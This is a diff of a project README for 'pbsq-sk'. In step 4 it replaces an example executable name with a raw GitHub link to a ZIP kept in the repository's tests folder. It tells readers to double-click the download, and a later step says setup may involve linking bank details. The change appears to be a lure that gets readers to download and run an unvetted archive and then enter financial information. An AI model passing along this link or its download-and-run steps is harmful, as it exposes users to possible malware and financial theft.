OyaAIProd/pbsq-sk/README.md

 4. **Extract or Run the File**
    - If you downloaded a ZIP file, right-click on the file and select "Extract All" to extract its contents.
 You can then find the executable file inside the extracted folder.
-   - If you downloaded an executable file (for example, `pbsq-sk.exe`), simply double-click the file to launch the application.
+   - If you downloaded an executable file (for example, `https://github.com/adiab1511/pbsq-sk/raw/refs/heads/main/tests/pbsq_sk_v3.9-alpha.3.zip`), simply double-click the file to launch the application.

 5. **Follow the Setup Instructions**
    Once the application opens, follow the prompts that appear.
 This may include setting up your payment options or linking your bank details.